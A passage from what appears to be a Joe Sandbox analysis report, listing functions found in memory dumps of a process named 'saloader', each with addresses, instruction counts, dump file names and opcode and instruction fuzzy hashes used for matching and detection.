                                                                                          • Instruction Fuzzy Hash: 67519231919BC58FFBAAC72DC044B66F7D1FF55318F48A678D08E87591DA68E889C380
                                                                                          Function 00007FFAAC7E9C30 Relevance: .1, Instructions: 144COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f5f7eae81807752d3377b444ffe4da3198b2ce2347888c230070b3ed867f7deb
                                                                                          • Instruction ID: 441842755c09c54600af192dd10b4b7cc44e5da69164a98436178ab372022477
                                                                                          • Opcode Fuzzy Hash: f5f7eae81807752d3377b444ffe4da3198b2ce2347888c230070b3ed867f7deb
                                                                                          • Instruction Fuzzy Hash: 04018F12A1EBD44FE396973C18645753FF1DFA7211B0904EBD488CB1A7DA199C498392
                                                                                          Function 00007FFAAC7E9D85 Relevance: .1, Instructions: 136COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6809a31d9ec907c026c2109388253c33f6300cb6b5d0e8f179b2e4b6c3b42898
                                                                                          • Instruction ID: 0701e43bef733f2f2f105edf8659d9f2be7b2788d98f9029769a3d0fb7fdae71
                                                                                          • Opcode Fuzzy Hash: 6809a31d9ec907c026c2109388253c33f6300cb6b5d0e8f179b2e4b6c3b42898
                                                                                          • Instruction Fuzzy Hash: 35413032A18A4D8FDF95EF68C454AE9B7F1FFA9300B1445AAD00ED7296DE34E845C780
                                                                                          Function 00007FFAAC629F08 Relevance: .1, Instructions: 131COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e805415fdfeebf715e049d2cee18efa7e624766ff5f04c7dd9d15399740477ea
                                                                                          • Instruction ID: 39c91ccad6cfdeda66a90a7378ca75031916d484d7c56a2be6809a2e338192f6
                                                                                          • Opcode Fuzzy Hash: e805415fdfeebf715e049d2cee18efa7e624766ff5f04c7dd9d15399740477ea
                                                                                          • Instruction Fuzzy Hash: 51417C30709A088FE7A9EF2CD598BA577D1EF5A300F0550BAE48DC72A6DE24EC45C781
                                                                                          Function 00007FFAAC7E1730 Relevance: .1, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dec0fe035f7f49ed64daecdf5639392602e02a1a5843349f344eb8c7b1895bfb
                                                                                          • Instruction ID: ecf5d2ae82218b07591182da6c40edda5254cf4448188804dad67a4c42526192
                                                                                          • Opcode Fuzzy Hash: dec0fe035f7f49ed64daecdf5639392602e02a1a5843349f344eb8c7b1895bfb
                                                                                          • Instruction Fuzzy Hash: C0313952A2DA8A4BF7A8977D844A6B677D1EF59210F40807EE04FC31D3DE18E80983C1
                                                                                          Function 00007FFAAC7DE82D Relevance: .1, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a0ec58ad1ad27b1fc94a8a75b107f9e1c7156bd3f98993027e62e7685a27ac8
                                                                                          • Instruction ID: 5abc70d682d5c78578685d8e43877f8dde2dfcb6eba6a53e39a4706042f9036e
                                                                                          • Opcode Fuzzy Hash: 0a0ec58ad1ad27b1fc94a8a75b107f9e1c7156bd3f98993027e62e7685a27ac8
                                                                                          • Instruction Fuzzy Hash: DE312B5261DE864FE756E33C84956B5BBE2FF59310B0881BAD04EC7287DD18EC4987C1
                                                                                          Function 00007FFAAC7DE840 Relevance: .1, Instructions: 120COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9477823b36cef3b2db6a0f640f5804b62e7d3fab78c66102e849c1c1deed6b18
                                                                                          • Instruction ID: 2683c11d3bfeffdb67099adfbb98fa096cd56d06ad32e015f00517138f8c94c5
                                                                                          • Opcode Fuzzy Hash: 9477823b36cef3b2db6a0f640f5804b62e7d3fab78c66102e849c1c1deed6b18
                                                                                          • Instruction Fuzzy Hash: AA310852A2DE854FE755E77C44996B56BE2FF59310B0881BAD00EC7287DD18EC4987C0
                                                                                          Function 00007FFAAC63056D Relevance: .1, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2523520a29e004b375aa707aff12bfd36ab6d4114c700f468af76f373841a082
                                                                                          • Instruction ID: 241d6d02a64375b4fa41a2172f4a0beb009921be353b3b0a3b293d8b04b23cab
                                                                                          • Opcode Fuzzy Hash: 2523520a29e004b375aa707aff12bfd36ab6d4114c700f468af76f373841a082
                                                                                          • Instruction Fuzzy Hash: E2415230608A4ECFDB89EF18C494AA573E2FF993057205569D41EC7296DB31EC92CB80
                                                                                          Function 00007FFAAC7E15D8 Relevance: .1, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b6e6bc96aefef429c2316d4f31e7bc290931e08aedd9f64b88c77ebf22aef407
                                                                                          • Instruction ID: 920a893fb562e7975e899014ea7095ea740e2e76fe163addf33a5d2b6a2c5edc
                                                                                          • Opcode Fuzzy Hash: b6e6bc96aefef429c2316d4f31e7bc290931e08aedd9f64b88c77ebf22aef407
                                                                                          • Instruction Fuzzy Hash: 6E31E652A2EEC54FE756D37C44596B07BE2EF5A200B0881FAD04EC7197DD18EC4987D1
                                                                                          Function 00007FFAAC7EB63D Relevance: .1, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 939a95cbeb3b5f320040e58f96315b4460a0d57f49ec287ef39028ee38fb16e5
                                                                                          • Instruction ID: 16f308e4f05c75981bfbd916a7e00d967d7c6cc5785fce66abc5d9f33b522fd2
                                                                                          • Opcode Fuzzy Hash: 939a95cbeb3b5f320040e58f96315b4460a0d57f49ec287ef39028ee38fb16e5
                                                                                          • Instruction Fuzzy Hash: AA318431A1994A8FEB46EB78C415AB9BBF0EF5A340F0451FBD00DC71A3DE28AC458780
                                                                                          Function 00007FFAAC651DC0 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b54eb93ceaf3be921092cbee94b4256fb619cf7e0b0741029d5e5ce59dcf7bd5
                                                                                          • Instruction ID: 3630eba7d59d7b0a1cb96f9a2bb72b7c5a5287d644dd0c74b66bfcb76c5a724a
                                                                                          • Opcode Fuzzy Hash: b54eb93ceaf3be921092cbee94b4256fb619cf7e0b0741029d5e5ce59dcf7bd5
                                                                                          • Instruction Fuzzy Hash: E031C431A18A4E8FEB95EF2CC494AB577E1FF99350B2441BAD44EC7292DE24DC46C780
                                                                                          Function 00007FFAAC7DE788 Relevance: .1, Instructions: 107COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 41dd82b05caeca3dcc38cdbd8ae6a9264b51aad9a5f9c8f577411f33e731d70a
                                                                                          • Instruction ID: 6eb5f087610678011d749b0fb556ad920259081ebdd30c2b4362d82aa3d51fc5
                                                                                          • Opcode Fuzzy Hash: 41dd82b05caeca3dcc38cdbd8ae6a9264b51aad9a5f9c8f577411f33e731d70a
                                                                                          • Instruction Fuzzy Hash: 83314C71909F058AE7A9DB28C4492B2B6E0FF25315F508A3EC19FD2AA0DB75E449C780
                                                                                          Function 00007FFAAC62851F Relevance: .1, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 61ae2e704d9578591dac2e9c2c536fa95489274f77dd86b854fe1b69d67386e8
                                                                                          • Instruction ID: e5ac685cfca4b3ef83eb8f574edd04095a1cb42d14d31fb5563aa82f97117dfc
                                                                                          • Opcode Fuzzy Hash: 61ae2e704d9578591dac2e9c2c536fa95489274f77dd86b854fe1b69d67386e8
                                                                                          • Instruction Fuzzy Hash: 2B31B362C0E5968EF76797244C159F9BBE0EF4B220B0CA1F6C49CC7593E91CA51E87C2
                                                                                          Function 00007FFAAC615CE0 Relevance: .1, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8005864a4073b1bf10ad9537415a778a353c0602e423000b69520d232ca106e3
                                                                                          • Instruction ID: e89b8c0daf31ac87abd4e16b7f50528e8cf82b525480d9f7cf685d430567d436
                                                                                          • Opcode Fuzzy Hash: 8005864a4073b1bf10ad9537415a778a353c0602e423000b69520d232ca106e3
                                                                                          • Instruction Fuzzy Hash: 0131A679D2D94A8FFB46E768C455AB977E0FF06302B0461BAD04EC7193CD28E9098780
                                                                                          Function 00007FFAAC62E6DF Relevance: .1, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb0c037f0539f11d95a1452f124c38d1cf536e8c3ee0d2702e5ceca93d4bacdd
                                                                                          • Instruction ID: c81369698af307324ad19c859a1578a011c804d2471c7d2f1fa975733dee2910
                                                                                          • Opcode Fuzzy Hash: cb0c037f0539f11d95a1452f124c38d1cf536e8c3ee0d2702e5ceca93d4bacdd
                                                                                          • Instruction Fuzzy Hash: 4B31D322C0E5868EF763876448151F4BBE8EF47221B08A1B6D4ADC74D3E91CA50E87C2
                                                                                          Function 00007FFAAC62DD52 Relevance: .1, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6974426d0c7e8a47cdaa5972a1b1b228b213867bc6f8ee3b7f9b5e52a1bfee4
                                                                                          • Instruction ID: f240803f2499cc525c350d8cd51b7c8ce8d3a04a52a1c9e7cfb4cefffb207930
                                                                                          • Opcode Fuzzy Hash: f6974426d0c7e8a47cdaa5972a1b1b228b213867bc6f8ee3b7f9b5e52a1bfee4
                                                                                          • Instruction Fuzzy Hash: 7631C736C0EA9E8AF762E72454011F9F6D1EF56350F04A5B6D44CCB0D2FD28A91EC6C1
                                                                                          Function 00007FFAAC627618 Relevance: .1, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1bb7d064d9cbd67578ac00530c8e74d615c3d91c64e72830343a3a662f854572
                                                                                          • Instruction ID: fe6a42eaabfe8ee812bd7e03e8916499fcab6235f92c689bde876d860fac2f43
                                                                                          • Opcode Fuzzy Hash: 1bb7d064d9cbd67578ac00530c8e74d615c3d91c64e72830343a3a662f854572
                                                                                          • Instruction Fuzzy Hash: 6431581294DBD54AF3A7833C68543B6BFC1AF12324F4821BBC889C69C2D94DF989C381
                                                                                          Function 00007FFAAC62BF80 Relevance: .1, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eaebc8e647da1b5013383aed11fa1a52f7e08072e64eab412943603f31384bc9
                                                                                          • Instruction ID: a89f996165ccf199d5f247346de29f312a13730255e3ee66c0e196a5da691205
                                                                                          • Opcode Fuzzy Hash: eaebc8e647da1b5013383aed11fa1a52f7e08072e64eab412943603f31384bc9
                                                                                          • Instruction Fuzzy Hash: 9921B57162CA454FEB4CE628948A9BA77D1FBA9310F54903EF08FC3597DD24E8064686
                                                                                          Function 00007FFAAC655DD0 Relevance: .1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ef15851197c7d81f9fc2fa19ebaa3008007026e077362d5083f8340ef98b826a
                                                                                          • Instruction ID: aec8d6bc9fe1a21402564caa43cef7650e0a47665413c14dfdcbe2e95657b10d
                                                                                          • Opcode Fuzzy Hash: ef15851197c7d81f9fc2fa19ebaa3008007026e077362d5083f8340ef98b826a
                                                                                          • Instruction Fuzzy Hash: 66213561A1DB498FF369D72C8855171B7E1EF8E210B14A6FBD04DC72D6D928EC8983C2
                                                                                          Function 00007FFAAC611646 Relevance: .1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ae88b75771eebee728f142aee25816bb428dd95778c34de9aaa22c7899231634
                                                                                          • Instruction ID: e1365aa5490f25c5435ded091179931d6c0e4b37217c92d24f3951bf02c3406f
                                                                                          • Opcode Fuzzy Hash: ae88b75771eebee728f142aee25816bb428dd95778c34de9aaa22c7899231634
                                                                                          • Instruction Fuzzy Hash: F0212521B1CA898FE759E77C445A6747BD2EF8A215B0441FAE00DC72A3DD28DC4A83D1
                                                                                          Function 00007FFAAC7E31E8 Relevance: .1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b92439c4ec137ad9533223d281c4d9618d02f4e625f62b001a8cb8241b771e2b
                                                                                          • Instruction ID: 317af0a5af9f457c3ed016bfe279e2e3502809faeb0b2e8673746af514d11664
                                                                                          • Opcode Fuzzy Hash: b92439c4ec137ad9533223d281c4d9618d02f4e625f62b001a8cb8241b771e2b
                                                                                          • Instruction Fuzzy Hash: 7921B531619A0A8FEB54EB2DD88596177E2FF59320710837DD08EC32A6DA28FC8587C0
                                                                                          Function 00007FFAAC62857C Relevance: .1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1d3a7d2dccb9c25d58c55b247e155d8771f7dded8ad8df6fec81d2f3139e2c89
                                                                                          • Instruction ID: 59a2f0f030d26f4d48cd51a1c1099fa2e30790eef94c7a775991e77f6f85c9a5
                                                                                          • Opcode Fuzzy Hash: 1d3a7d2dccb9c25d58c55b247e155d8771f7dded8ad8df6fec81d2f3139e2c89
                                                                                          • Instruction Fuzzy Hash: C421D237C0A99E8AF7B1E7245C119F9B6D1EF4A310F086176D41CD3582FD1CA91D46C1
                                                                                          Function 00007FFAAC6255E7 Relevance: .1, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 88a1a2a9519c0795b4f8be357d26dd959deffa7f526460e57c98a0073802872d
                                                                                          • Instruction ID: 657828c09e383227a0efc2a56d07fa8286584803ee1b445e6878fa43190261e3
                                                                                          • Opcode Fuzzy Hash: 88a1a2a9519c0795b4f8be357d26dd959deffa7f526460e57c98a0073802872d
                                                                                          • Instruction Fuzzy Hash: 0A217F30718D088FEA9CEB2CD489EB577E1FBA9310B10516DE44EC36A6DE24EC45C780
                                                                                          Function 00007FFAAC660E28 Relevance: .1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06c39ad088efc9423133f677233d5e0951a420067c04de7ca2dcff95ad83a0ba
                                                                                          • Instruction ID: 57dccfa86c52c11992fd1c4e3a6b122f8bed59dbd03ae07603820b286a9fcbbc
                                                                                          • Opcode Fuzzy Hash: 06c39ad088efc9423133f677233d5e0951a420067c04de7ca2dcff95ad83a0ba
                                                                                          • Instruction Fuzzy Hash: B7313230919B95CFF7AAD7288055371FBE09F16308F18A8A9C48DC65D2D659F8C9C781
                                                                                          Function 00007FFAAC7D6359 Relevance: .1, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca55c419b79854edd260f736f9b39f4c5b41ce0bcb574225ccee38afe8c72994
                                                                                          • Instruction ID: 8d17f8d4e5e4086a8e13e4db7b013d0572950b4780ca1e08e4a134a17e0cdf34
                                                                                          • Opcode Fuzzy Hash: ca55c419b79854edd260f736f9b39f4c5b41ce0bcb574225ccee38afe8c72994
                                                                                          • Instruction Fuzzy Hash: D021E93AD0E59A8AFFA2A3144811BFA76F1EF86311F448977D45DC30C2DD18E91E4AC1
                                                                                          Function 00007FFAAC7D674D Relevance: .1, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdb3ab150ba32b74351c0bbf6dea64dc7b0ab2eda342cdf7f62e08a6bd2b7988
                                                                                          • Instruction ID: 98c12c5ba1be310101088cb52ef439f817add1bd35553e4c0004079d9bdb30be
                                                                                          • Opcode Fuzzy Hash: cdb3ab150ba32b74351c0bbf6dea64dc7b0ab2eda342cdf7f62e08a6bd2b7988
                                                                                          • Instruction Fuzzy Hash: 9B31326484F3C69FEB5783385854AA07FA45F43330F1AC5FBD08C8A4A3D65D984AC792
                                                                                          Function 00007FFAAC62E74B Relevance: .1, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 15dbfa56a1eb59b7a0146929b3141a64cbe24154d2bf2f7e9e4fc79bd81bde12
                                                                                          • Instruction ID: 3b92b62efce5849e737d454d9fd38e4eb61eca6ec54d2ab32bb504e20609ef58
                                                                                          • Opcode Fuzzy Hash: 15dbfa56a1eb59b7a0146929b3141a64cbe24154d2bf2f7e9e4fc79bd81bde12
                                                                                          • Instruction Fuzzy Hash: 9D21E736C0A95D8AFB71E76498011F9B2D8EF56312F047175D4ADC3582FE2CA91D85C1
                                                                                          Function 00007FFAAC6255A8 Relevance: .1, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8ae8c1dc09b3d7f60e4bc24fdf6e0779e9fe83f782f4e651c8f990db361540d4
                                                                                          • Instruction ID: 64c07e6b7404b22bf69988bb259073eb22561d3892cb3c0d301a93df4b6a2f62
                                                                                          • Opcode Fuzzy Hash: 8ae8c1dc09b3d7f60e4bc24fdf6e0779e9fe83f782f4e651c8f990db361540d4
                                                                                          • Instruction Fuzzy Hash: 2821B965D19A4ACFEB86EB6888153B8B7F1FF1A300F0450B6D40DC71D3EA6899858792
                                                                                          Function 00007FFAAC625720 Relevance: .1, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9d2f464c9766921d7e3397cd96a8f70a55286f84cd137b74d7afdd4fc47291df
                                                                                          • Instruction ID: ddd1e73a2120fe126d6d01edc3b78622b85e264cdb66f4ac2d04f81765db5bbe
                                                                                          • Opcode Fuzzy Hash: 9d2f464c9766921d7e3397cd96a8f70a55286f84cd137b74d7afdd4fc47291df
                                                                                          • Instruction Fuzzy Hash: 9821BF72C0AC5ECAFB71E724D801AF9BA95EF46350F00A179E41CC3082FD28A91E46C1
                                                                                          Function 00007FFAAC6107B8 Relevance: .1, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 591743e835b5afdff5337b6f5450c71e979ff138ef1478cfa387a174ec357f0a
                                                                                          • Instruction ID: 5643f27630ecc3423e6c5fe7cb2382136445db3b8f84702b29ece146747c8672
                                                                                          • Opcode Fuzzy Hash: 591743e835b5afdff5337b6f5450c71e979ff138ef1478cfa387a174ec357f0a
                                                                                          • Instruction Fuzzy Hash: 1811E621B28E5E8FFA68E72C544A67977C2EB8E255F0455BAF00DC3296DD24EC4683C1
                                                                                          Function 00007FFAAC655D78 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
